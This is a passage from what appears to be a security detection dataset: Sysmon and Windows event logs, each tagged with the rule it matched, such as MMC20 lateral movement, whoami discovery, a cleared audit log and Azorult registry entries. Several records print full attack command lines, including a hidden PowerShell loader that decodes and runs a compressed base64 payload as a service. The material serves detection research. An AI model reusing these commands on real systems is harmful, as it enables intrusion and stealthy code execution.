Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"edcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311414,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-10T10:20:37.672499Z"}},"Version":2}}}},{"detection":["Suspicious Shells Spawn by SQL Server"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c set > c:\\users\\\\public\\netstat.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CE3B-5DBE-0000-00201ED50100","LogonId":"0x1d51e","ParentCommandLine":"\"c:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS","ParentImage":"C:\\Program Files\\Microsoft SQL 
Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe","ParentProcessGuid":"747F3D96-CE42-5DBE-0000-0010EE430200","ParentProcessId":3936,"ProcessGuid":"747F3D96-DB7C-5DBE-0000-0010CF6B9502","ProcessId":5004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\sqlsvc","UtcTime":"2019-11-03 13:51:56.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":56509,"Execution":{"#attributes":{"ProcessID":3180,"ThreadID":4224}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-11-03T13:51:58.263043Z"}},"Version":5}}}},{"detection":["MMC20 Lateral Movement"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Management Console","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1","Image":"C:\\Windows\\System32\\mmc.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-001087700000","ParentProcessId":612,"ProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ProcessId":3572,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:11.856"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9832,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:11.856089Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B180-5CC8-0000-00102BB71E00","ProcessId":1504,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 
20:35:12.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9833,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:12.449839Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-0010ADBF1E00","ProcessId":3372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 
20:35:13.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9838,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:13.449839Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell","Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ProcessId":1256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 
20:35:13.512"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9839,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:13.512339Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B181-5CC8-0000-001023C41E00","ParentProcessId":1256,"ProcessGuid":"365ABB72-B181-5CC8-0000-00108DC71E00","ProcessId":692,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 
20:35:13.527"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9840,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:35:13.543589Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC04.example.corp","Correlation":null,"EventID":1102,"EventRecordID":6272,"Execution":{"#attributes":{"ProcessID":792,"ThreadID":3120}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T19:26:42.116688Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"PC04","SubjectLogonId":"0x128a9","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"}}}}},{"detection":["Registry Entries For Azorult Malware","DLL Load via LSASS"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\\\\172.16.66.254\\shared\\lsadb.dll","EventType":"SetValue","Image":"C:\\WINDOWS\\system32\\svchost.exe","ProcessGuid":"6A3C3EF2-E699-5F7C-0000-001048EF0000","ProcessId":404,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","UtcTime":"2020-10-06 
22:11:17.814"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"02694w-win10.threebeesco.com","Correlation":null,"EventID":13,"EventRecordID":345994,"Execution":{"#attributes":{"ProcessID":10204,"ThreadID":2096}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-06T22:11:17.814931Z"}},"Version":2}}}},{"detection":["Hijack Legit RDP Session to Move Laterally","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-14 13:55:57.243","Image":"C:\\Windows\\system32\\mstsc.exe","ProcessGuid":"ECAD0485-C903-5CDA-0000-0010340F1000","ProcessId":2580,"RuleName":"","TargetFilename":"C:\\Users\\administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cmd.exe","UtcTime":"2019-05-14 14:04:05.696"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"alice.insecurebank.local","Correlation":null,"EventID":11,"EventRecordID":31145,"Execution":{"#attributes":{"ProcessID":1580,"ThreadID":2324}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T14:04:05.697491Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft 
Corporation","CurrentDirectory":"c:\\ProgramData\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-3991-5D0B-0000-002029350100","LogonId":"0x13529","ParentCommandLine":"\"cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-3ED4-5D0B-0000-0010B2871A00","ParentProcessId":1440,"ProcessGuid":"365ABB72-3ED8-5D0B-0000-0010398F1A00","ProcessId":1476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-20 08:07:52.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8119,"Execution":{"#attributes":{"ProcessID":2020,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-20T08:07:52.956810Z"}},"Version":5}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k localService -p -s RemoteRegistry","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3407-5FCB-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2020-12-04 22:41:04.465"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549016,"Execution":{"#attributes":{"ProcessID":3560,"ThreadID":4600}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-04T22:41:04.470207Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\System32\\Rundll32.exe smssvc.dll,Start","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SUpdate","UtcTime":"2020-12-04 
22:41:04.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":549018,"Execution":{"#attributes":{"ProcessID":3560,"ThreadID":4600}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-04T22:41:04.545145Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9805,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:51.949839Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware","PowerShell as a Service in Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w 
hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\ImagePath","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9806,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:51.981089Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Curl Start Combination","Encoded FromBase64String"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ParentProcessId":460,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ProcessId":3348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.949"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9807,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:52.090464Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Encoded 
FromBase64String"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ParentProcessId":3348,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 